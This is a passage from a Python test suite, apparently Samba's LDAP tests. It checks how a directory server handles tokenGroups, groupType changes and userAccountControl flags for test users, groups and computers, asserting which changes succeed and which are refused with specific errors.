res = ldb.search(self.base_dn, scope=SCOPE_BASE, attrs=["tokenGroups"])
self.assertTrue(len(res) == 1)
self.assertFalse("tokenGroups" in res[0])
# The domain administrator should contain "tokenGroups" entries
# (the exact number depends on the domain/forest function level and the
# DC software versions)
res = ldb.search("cn=Administrator,cn=Users," + self.base_dn,
scope=SCOPE_BASE, attrs=["tokenGroups"])
self.assertTrue(len(res) == 1)
self.assertTrue("tokenGroups" in res[0])
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
# This testuser should contain at least two "tokenGroups" entries
# (exactly two on an unmodified "Domain Users" and "Users" group)
res = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["tokenGroups"])
self.assertTrue(len(res) == 1)
self.assertTrue(len(res[0]["tokenGroups"]) >= 2)
# One entry should point to the domain's "Domain Users" group and another
# entry should point to the builtin "Users" group
domain_users_group_found = False
users_group_found = False
for sid in res[0]["tokenGroups"]:
rid = security.dom_sid(ldb.schema_format_value("objectSID", sid)).split()[1]
if rid == 513:
domain_users_group_found = True
if rid == 545:
users_group_found = True
self.assertTrue(domain_users_group_found)
self.assertTrue(users_group_found)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
def test_groupType(self):
"""Test the groupType behaviour"""
print "Testing groupType behaviour\n"
# You can never create or change to a
# "GTYPE_SECURITY_BUILTIN_LOCAL_GROUP"
# Add operation
# Invalid attribute
try:
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
try:
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_SECURITY_BUILTIN_LOCAL_GROUP)})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_SECURITY_GLOBAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_SECURITY_UNIVERSAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_SECURITY_DOMAIN_LOCAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_LOCAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_DISTRIBUTION_GLOBAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_GLOBAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_LOCAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
# Modify operation
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group"})
# We can change in this direction: global <-> universal <-> local.
# At each step the group type itself (security/distribution) can also
# be changed.
# After creation we should have a "security global group"
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Invalid attribute
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement("0",
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Security groups
# Default is "global group"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change to "local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change to "local"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_LOCAL_GROUP)
# Change to "global" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change to "builtin local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_BUILTIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change to "builtin local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_BUILTIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change to "builtin local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_BUILTIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Distribution groups
# Default is "global group"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_GLOBAL_GROUP)
# Change to local (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_GLOBAL_GROUP)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
# Change to "local"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_LOCAL_GROUP)
# Change to "global" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Try to add a non-existent member (should be denied)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["member"] = MessageElement(
"cn=ldaptestuser3,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_GLOBAL_GROUP)
# Both group types: only spot checks are performed here - covering all
# possible transitions would require too much code.
# Default is "global group"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change to "local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change to "local"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_LOCAL_GROUP)
# Change to "global" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
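# The groupType transition checks above repeat one pattern many times; a
# minimal helper sketch of that pattern is shown below (the helper name
# and its placement are illustrative only, not part of the original
# suite):
#
# def _check_group_type_change(ldb, dn, gtype, expected_atype):
#     m = Message()
#     m.dn = Dn(ldb, dn)
#     m["groupType"] = MessageElement(str(gtype), FLAG_MOD_REPLACE,
#                                     "groupType")
#     ldb.modify(m)
#     res = ldb.search(dn, scope=SCOPE_BASE, attrs=["sAMAccountType"])
#     assert len(res) == 1
#     assert int(res[0]["sAMAccountType"][0]) == expected_atype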
def test_userAccountControl(self):
"""Test the userAccountControl behaviour"""
print "Testing userAccountControl behaviour\n"
# With a user object
# Add operation
# As user you can only set a normal account.
# The UF_PASSWD_NOTREQD flag is needed since we haven't requested a
# password yet.
# With SYSTEM rights you can set an interdomain trust account.
# Invalid attribute
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"userAccountControl": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# This has to wait until s4 supports it (needs a password module change)
# try:
# ldb.add({
# "dn": "cn=ldaptestuser,cn=users," + self.base_dn,
# "objectclass": "user",
# "userAccountControl": str(UF_NORMAL_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"userAccountControl": str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD)})
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE == 0)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"userAccountControl": str(UF_TEMP_DUPLICATE_ACCOUNT)})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OTHER)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# This isn't supported yet in s4
# try:
# ldb.add({
# "dn": "cn=ldaptestuser,cn=users," + self.base_dn,
# "objectclass": "user",
# "userAccountControl": str(UF_SERVER_TRUST_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_OBJECT_CLASS_VIOLATION)
# delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
#
# try:
# ldb.add({
# "dn": "cn=ldaptestuser,cn=users," + self.base_dn,
# "objectclass": "user",
# "userAccountControl": str(UF_WORKSTATION_TRUST_ACCOUNT)})
# except LdbError, (num, _):
# self.assertEquals(num, ERR_OBJECT_CLASS_VIOLATION)
# delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# This isn't supported yet in s4 - needs ACL module adaption
# try:
# ldb.add({
# "dn": "cn=ldaptestuser,cn=users," + self.base_dn,
# "objectclass": "user",
# "userAccountControl": str(UF_INTERDOMAIN_TRUST_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
# delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Modify operation
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
# After creation we should have a normal account
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE != 0)
# As user you can only switch from a normal account to a workstation
# trust account and back.
# The UF_PASSWD_NOTREQD flag is needed since we haven't requested a
# password yet.
# With SYSTEM rights you can switch to an interdomain trust account.
# Invalid attribute
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement("0",
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# This has to wait until s4 supports it (needs a password module change)
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_NORMAL_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE == 0)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_TEMP_DUPLICATE_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OTHER)
# This isn't supported yet in s4
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_SERVER_TRUST_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_WORKSTATION_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
# This isn't supported yet in s4 - needs ACL module adaption
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_INTERDOMAIN_TRUST_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
# With a computer object
# Add operation
# As computer you can set a normal account and a server trust account.
# The UF_PASSWD_NOTREQD flag is needed since we haven't requested a
# password yet.
# With SYSTEM rights you can set an interdomain trust account.
# Invalid attribute
try:
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# This has to wait until s4 supports it (needs a password module change)
# try:
# ldb.add({
# "dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
